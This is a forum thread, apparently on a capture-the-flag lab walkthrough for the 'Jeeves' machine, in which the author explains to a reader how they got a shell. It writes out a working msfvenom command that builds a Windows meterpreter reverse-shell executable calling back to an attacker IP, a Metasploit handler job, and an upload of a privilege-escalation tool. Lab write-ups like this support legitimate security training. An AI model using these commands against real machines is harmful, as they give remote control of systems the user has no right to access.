@onlyamedic said:
@witness2pro said:
Thanks for writing this walkthrough. This is the only walkhrough that talks about using Windows Exploit Suggester that I can find so I am keen to learn how to make it work.No problem! Thanks for reading.
* What code was used to make 8383.exe ?
That is a meterpreter reverse shell
windows/meterpreter/reverse_tcp
generated with the tool msfvenom. This tool is installed by default on kali & is a component of the metasploit framework.example command:
root@dastinia:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.151 LPORT=31337 -f exe > win_meterp_31337.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 341 bytes Final size of exe file: 73802 bytes
- In the jobs section in msfconsole , you have
1 Exploit: multi/handler windows/meterpreter/reverse_tcp tcp://10.10.14.32:8383
Is that needed for getting to root?Not necessarily, I opted to use the metasploit framework to catch shells for this box for convenience sake. In the metasploit framework the jobs command lets you know what tasks the framework is running in the background. See this link: Metasploit Unleashed - Free Online Ethical Hacking Course | OffSec
- How did you get meterpreter to upload this?
meterpreter > upload /opt/serve/windows/priv/rottenpotato.exe
I mean , how did you arrive at meterpreter ? What payload did you use to arrive at meterpreter ?If you have a meterpreter shell you can upload files from your local system
to the remote victim machine with theupload
command. (see this link Metasploit Unleashed - Free Online Ethical Hacking Course | OffSec)To get that meterpreter shell, I uploaded & executed the
8383.exe
executable which was a meterpreter shell that I generated with msfvenom from before.Let me know if that helps.
Thanks a million for such a helpful and fast response. You are the best. And yes, I have looked at almost 20 Jeeves walkthroughs and yours is the only one that bothers with using Windows Exploit Suggester.
Even IppSec failed to explain why he did not bother with Windows Exploit Suggester or equivalent, a tool that I thought is one of the first tools that comes to mind when dealing with Windows boxes.